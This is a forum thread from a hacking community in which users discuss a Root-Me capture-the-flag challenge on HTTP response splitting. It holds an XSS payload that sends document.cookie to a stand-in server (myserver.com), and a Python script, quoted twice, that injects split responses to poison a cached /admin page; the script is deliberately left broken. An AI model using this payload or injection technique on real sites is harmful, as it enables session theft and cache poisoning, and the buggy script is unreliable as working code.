EvilZone

Community => General discussion => Topic started by: lvl on May 25, 2014, 07:53:05 PM

Title: Challenge HTTP Response Splitting
Post by: lvl on May 25, 2014, 07:53:05 PM

Hi,
Can you help me to correct this code? I do not manage to validate the test of this challenge.

The variable xss has to contain:

Code: [Select]

xss  = "<html><script>document.location=\"http://myserver.com/index.php?cookie=\"+document.cookie</script></html>"
code :
http://pastebin.com/GsW7LFC7 (http://pastebin.com/GsW7LFC7)

challenge :
http://www.root-me.org/en/Challenges/Web-Client/HTTP-Response-Splitting-381 (http://www.root-me.org/en/Challenges/Web-Client/HTTP-Response-Splitting-381)

Thank you!

Title: Re: Challenge HTTP Response Splitting
Post by: Architect on May 27, 2014, 03:09:51 AM

ThePH30N1X: Your response is equal to "I don't know what I'm talking about but Google is your friend."

Both unproductive and showing how little you probably know about the subject.
This isn't high school. Here when we reply to people it is conducive to a productive environment.
Almost never will you see a legitimate user ask about something, only to see a response by another user who has been here a while, "Google it n00b."

Now back to the code itself:
You made several mistakes in the use of sockets, and in your syntax.
I won't give you the answer but I have done a bit to help you out.
Good luck.

Code: (python) [Select]

#!/usr/bin/python
# coding: utf-8
import re, socket, sys, urllib

# create TCP stream
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
    print '[!]Failed to create socket. Error code: ' + str(msg[0])
    sys.exit();

print '[+] Created TCP socket.'

def encode(data):
    return re.sub("\n", "\r\n", data.lstrip())

try:
    server = s.connect()
    server.connect(("188.165.33.26", 58002))
    session = []
except:
    print '[!] Unable to resolve.'
    print '[!] Closing SOCK_STREAM and exiting.'
    s.close();
    sys.exit();

# Empty the cache
data = """
    GET /admin HTTP/1.1
    Cache-Control: no-cache
    Cookie: spip_session=%s
    """ % (session)
server.send(encode(data))
print '[+] Clearing the cache.'
print server.recv(4096)

# Injection reponse
xss  = "VOTRE XSS"
code = """
    en
    Content-Length: 0
    HTTP/1.1 200 OK
    Content-Length: %d
    %s
    """ % (len(xss), xss)
data = """
    GET /user/param?lang=%s HTTP/1.1
    Cookie: spip_session=%s
    """ % (urllib.quote(encode(code)), session)
server.send(encode(data))
print '[+] XSS injected.'
print server.recv(4096)

# Changing the page cache /admin
data = """
    GET /admin HTTP/1.1
    Cookie: spip_session=%s
    """ % (session)
server.send(encode(data))
print '[+] Affichage de la page modifiee'

# receive data from STREAMing socket
print server.recv(4096)

# Close socket.
# This is important.
print '[+] Successful injection.'
print '[!] Closing TCP stream.'
s.close()

Title: Re: Challenge HTTP Response Splitting
Post by: lvl on May 27, 2014, 05:41:22 PM

Thank you very much but I cant connect.  :-[

Log :

• Created TCP socket.
[!] Unable to resolve.
[!] Closing SOCK_STREAM and exiting.

Title: Re: Challenge HTTP Response Splitting
Post by: Architect on May 28, 2014, 02:39:27 AM

I said I'd help you out, not make it work flawlessly.

Title: Re: Challenge HTTP Response Splitting
Post by: lvl on May 28, 2014, 06:43:05 PM

thanks

Title: Re: Challenge HTTP Response Splitting
Post by: ThePH30N1X on May 28, 2014, 07:37:48 PM

Quote from: Architect on May 27, 2014, 03:09:51 AM

ThePH30N1X: Your response is equal to "I don't know what I'm talking about but Google is your friend."

Both unproductive and showing how little you probably know about the subject.
This isn't high school. Here when we reply to people it is conducive to a productive environment.
Almost never will you see a legitimate user ask about something, only to see a response by another user who has been here a while, "Google it n00b."

Now back to the code itself:
You made several mistakes in the use of sockets, and in your syntax.
I won't give you the answer but I have done a bit to help you out.
Good luck.

Code: (python) [Select]

#!/usr/bin/python
# coding: utf-8
import re, socket, sys, urllib

# create TCP stream
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
    print '[!]Failed to create socket. Error code: ' + str(msg[0])
    sys.exit();

print '[+] Created TCP socket.'

def encode(data):
    return re.sub("\n", "\r\n", data.lstrip())

try:
    server = s.connect()
    server.connect(("188.165.33.26", 58002))
    session = []
except:
    print '[!] Unable to resolve.'
    print '[!] Closing SOCK_STREAM and exiting.'
    s.close();
    sys.exit();

# Empty the cache
data = """
    GET /admin HTTP/1.1
    Cache-Control: no-cache
    Cookie: spip_session=%s
    """ % (session)
server.send(encode(data))
print '[+] Clearing the cache.'
print server.recv(4096)

# Injection reponse
xss  = "VOTRE XSS"
code = """
    en
    Content-Length: 0
    HTTP/1.1 200 OK
    Content-Length: %d
    %s
    """ % (len(xss), xss)
data = """
    GET /user/param?lang=%s HTTP/1.1
    Cookie: spip_session=%s
    """ % (urllib.quote(encode(code)), session)
server.send(encode(data))
print '[+] XSS injected.'
print server.recv(4096)

# Changing the page cache /admin
data = """
    GET /admin HTTP/1.1
    Cookie: spip_session=%s
    """ % (session)
server.send(encode(data))
print '[+] Affichage de la page modifiee'

# receive data from STREAMing socket
print server.recv(4096)

# Close socket.
# This is important.
print '[+] Successful injection.'
print '[!] Closing TCP stream.'
s.close()

How do I not know what I'm talking about? And why should I explain something to someone if it has already been explained multiple times?

Title: Re: Challenge HTTP Response Splitting
Post by: Architect on May 29, 2014, 03:26:57 AM

I'm just calling it like it is.